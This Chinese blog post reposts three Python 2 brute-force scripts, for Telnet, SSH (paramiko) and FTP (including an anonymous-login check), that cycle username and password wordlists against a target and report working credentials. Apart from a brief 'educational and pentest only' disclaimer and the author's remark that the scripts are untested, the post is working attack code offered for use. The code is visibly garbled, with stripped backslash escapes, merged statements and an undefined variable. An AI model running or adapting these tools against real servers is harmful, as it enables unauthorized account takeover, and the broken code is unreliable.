一些有用的Python脚本[bak]


Telnet爆破脚本:
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, random, sys, telnetlib
from copy import copy

if len(sys.argv) !=4:
	print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
	sys.exit(1)

try:
  	users = open(sys.argv[2], "r").readlines()
except(IOError):
  	print "Error: Check your userlist pathn"
  	sys.exit(1)

try:
  	words = open(sys.argv[3], "r").readlines()
except(IOError):
  	print "Error: Check your wordlist pathn"
  	sys.exit(1)

print "nt   d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
print "t--------------------------------------------------n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"n"

wordlist = copy(words)

def reloader():
	for word in wordlist:
		words.append(word)

def getword():
	lock = threading.Lock()
	lock.acquire()
	if len(words) != 0:
		value = random.sample(words,  1)
		words.remove(value[0])

	else:
		print "nReloading Wordlist - Changing Usern"
		reloader()
		value = random.sample(words,  1)
		users.remove(users[0])

	lock.release()
	if len(users) ==1:
		return value[0][:-1], users[0]
	else:
		return value[0][:-1], users[0][:-1]

class Worker(threading.Thread):

	def run(self):
		value, user = getword()
		try:
			print "-"*12
			print "User:",user,"Password:",value
			tn = telnetlib.Telnet(sys.argv[1])
			tn.read_until("login: ")
			tn.write(user + "n")
			if password:
					tn.read_until("Password: ")
					tn.write(value + "n")
			tn.write("lsn")
			tn.write("exitn")
			print tn.read_all()
			print "tnLogin successful:",value, user
			tn.close()
			work.join()
			sys.exit(2)
		except:
			pass

for I in range(len(words)*len(users)):
	work = Worker()
	work.start()
	time.sleep(1)
SSH的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = UTF-8-*-
#[email protected]:dengyongkai
#[email protected]:blog.sina.com.cn/kaiyongdeng

import sys
import os
import time
#from threading import Thread

try:
    from paramiko import SSHClient
    from paramiko import AutoAddPolicy
except ImportError:
    print G+'''
    You need paramiko module.
	http://www.lag.net/paramiko/
    Debian/Ubuntu: sudo apt-get install aptitude
				 : sudo aptitude install python-paramikon'''+END
    sys.exit(1)

docs =  """
        	[*] This was written for educational purpose and pentest only. Use it at your own risk.
        	[*] Author will be not responsible for any damage!
        	[*] Toolname        : ssh_bf.py
        	[*] Author          : xfk
        	[*] Version         : v.0.2
        	[*] Example of use  : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
	"""


if sys.platform == 'linux' or sys.platform == 'linux2':
         clearing = 'clear'
else:
         clearing = 'cls'
os.system(clearing)


R = "33[31m";
G = "33[32m";
Y = "33[33m"
END = "33[0m"


def logo():
         print G+"n          		|---------------------------------------------------------------|"
         print "         		|                                                               |"
         print "         		|               blog.sina.com.cn/kaiyongdeng                    |"
         print "         		|                16/05/2012 ssh_bf.py v.0.2                     |"
         print "         		|                  SSH Brute Forcing Tool                       |"
         print "         		|                                                               |"
         print "         		|---------------------------------------------------------------|n"
         print " n      	        	[-] %sn" % time.ctime()
         print docs+END


def help():
	print Y+"		[*]-H 		--hostname/ip 		<>the target hostname or ip address"
	print "		[*]-P 		--port 			<>the ssh service port(default is 22)"
	print "		[*]-U 		--usernamelist 		<>usernames list file"
	print "		[*]-P 		--passwordlist 		<>passwords list file"
	print "		[*]-H 		--help 			<>show help information"
	print "		[*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
	sys.exit(1)

def BruteForce(hostname,port,username,password):
        '''
        Create SSH connection to target
        '''
        ssh = SSHClient()
        ssh.set_missing_host_key_policy(AutoAddPolicy())
        try:
            ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
            status = 'ok'
            ssh.close()
        except Exception, e:
            status = 'error'
            pass
	return status


def makelist(file):
    '''
    Make usernames and passwords lists
    '''
    items = []

    try:
        fd = open(file, 'r')
    except IOError:
        print R+'unable to read file '%s'' % file+END
        pass

    except Exception, e:
        print R+'unknown error'+END
        pass

    for line in fd.readlines():
        item = line.replace('n', '').replace('r', '')
        items.append(item)
    fd.close()
    return items

def main():
        logo()
#	print "hello wold"
        try:
                for arg in sys.argv:
                        if arg.lower() == '-t' or arg.lower() == '--target':
                                hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
       		 	if arg.lower() == '-p' or arg.lower() == '--port':
       			 	port = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-u' or arg.lower() == '--userlist':
                                userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-w' or arg.lower() == '--wordlist':
                                wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                        elif arg.lower() == '-h' or arg.lower() == '--help':
                                help()
			elif len(sys.argv) <= 1:
                                help()
        except:
                print R+"[-]Cheak your parametars inputn"+END
                help()
        print G+"n[!] BruteForcing target ...n"+END
#        print "here is ok"
#        print hostname,port,wordlist,userlist
        usernamelist = makelist(userlist)
        passwordlist = makelist(wordlist)

        print Y+"[*] SSH Brute Force Praparing."
        print "[*] %s user(s) loaded." % str(len(usernamelist))
        print "[*] %s password(s) loaded." % str(len(passwordlist))
        print "[*] Brute Force Is Starting......."+END
	try:
        	for username in usernamelist:
        		for password in passwordlist:
				print G+"n[+]Attempt uaername:%s password:%s..." % (username,password)+END
                		current = BruteForce(hostname, port, username, password)
                        	if current == 'error':
					print R+"[-]O*O The username:%s and password:%s Is Disenbabled...n" % (username,password)+END
#                        		pass
                        	else:
                                	print G+"n[+] ^-^ HaHa,We Got It!!!"
                                	print "[+] username: %s" % username
                                	print "[+] password: %sn" % password+END
#                               	sys.exit(0)
	except:
		print R+"n[-] There Is Something Wrong,Pleace Cheak It."
		print "[-] Exitting.....n"+END
		raise
        print Y+"[+] Done.^-^n"+END
        sys.exit(0)


if __name__ == "__main__":
	main()
FTP的爆破脚本(比较罗嗦,待修改):
#!/usr/bin/env python
#-*-coding = utf-8-*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@2012-05-08

import sys, os, time
from ftplib import FTP
docs = """
           [*] This was written for educational purpose and pentest only. Use it at your own risk.
           [*] Author will be not responsible for any damage!
           [*] Toolname : ftp_bf.py
           [*] Coder :
           [*] Version : 0.1
           [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
       """

if sys.platform == 'linux' or sys.platform == 'linux2':
    clearing = 'clear'
else:
    clearing = 'cls'
os.system(clearing)
R = "33[31m";
G = "33[32m";
Y = "33[33m"
END = "33[0m"
def logo():
    print G+"n |---------------------------------------------------------------|"
    print " | |"
    print " | blog.sina.com.cn/kaiyongdeng |"
    print " | 08/05/2012 ftp_bf.py v.0.1 |"
    print " | FTP Brute Forcing Tool |"
    print " | |"
    print " |---------------------------------------------------------------|n"
    print " n [-] %sn" % time.strftime("%X")
    print docs+END

def help():
    print R+"[*]-t, --target ip/hostname <> Our target"
    print "[*]-u, --usernamelist usernamelist <> usernamelist path"
    print "[*]-p, --passwordlist passwordlist <> passwordlist path"
    print "[*]-h, --help help <> print this help"
    print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)

def bf_login(hostname,username,password):
    # sys.stdout.write("r[!]Checking : %s " % (p))
    # sys.stdout.flush()
    try:
        ftp = FTP(hostname)
        ftp.login(hostname,username, password)
        ftp.retrlines('list')
        ftp.quit()
        print Y+"n[!] w00t,w00t!!! We did it ! "
        print "[+] Target : ",hostname, ""
        print "[+] User : ",username, ""
        print "[+] Password : ",password, ""+END
        return 1
    # sys.exit(1)
    except Exception, e:
        pass except KeyboardInterrupt: print R+"n[-] Exiting ...n"+END
    sys.exit(1)

def anon_login(hostname):
    try:
        print G+"n[!] Checking for anonymous login.n"+END
        ftp = FTP(hostname) ftp.login()
        ftp.retrlines('LIST')
        print Y+"n[!] w00t,w00t!!! Anonymous login successfuly !n"+END
        ftp.quit()
    except Exception, e:
        print R+"n[-] Anonymous login failed...n"+END
        pass

def main():
    logo()
    try:
        for arg in sys.argv:
            if arg.lower() == '-t' or arg.lower() == '--target':
                hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
            elif arg.lower() == '-h' or arg.lower() == '--help':
                help()
            elif len(sys.argv) <= 1:
                help()
    except:
        print R+"[-]Cheak your parametars inputn"+END
        help()

    print G+"[!] BruteForcing target ..."+END
    anon_login(hostname)
    # print "here is ok"
    # print hostname
    try:
        usernames = open(usernamelist, "r")
        user = usernames.readlines()
        count1 = 0
        while count1 < len(user):
            user[count1] = user[count1].strip()
            count1 +=1
    except:
        print R+"n[-] Cheak your usernamelist pathn"+END
        sys.exit(1)

    # print "here is ok ",usernamelist,passwordlist
    try:
        passwords = open(passwordlist, "r")
        pwd = passwords.readlines()
        count2 = 0
        while count2 < len(pwd):
            pwd[count2] = pwd[count2].strip()
            count2 +=1
    except:
        print R+"n[-] Check your passwordlist pathn"+END
        sys.exit(1)

    print G+"n[+] Loaded:",len(user),"usernames"
    print "n[+] Loaded:",len(pwd),"passwords"
    print "[+] Target:",hostname
    print "[+] Guessing...n"+END
    for u in user: for p in pwd:
        result = bf_login(hostname,u.replace("n",""),p.replace("n",""))
        if result != 1:
            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
        else:
            print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
        if not result :
            print R+"n[-]There is no username ans password enabled in the list."
            print "[-]Exiting...n"+END

if __name__ == "__main__":
    main()

上面的3个脚本都还没有测试,等测试了之后把测试效果补充上。然后还有别的爆破脚本以后慢慢补充,不同的情况有不同的方法,要灵活运用!

, ,

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注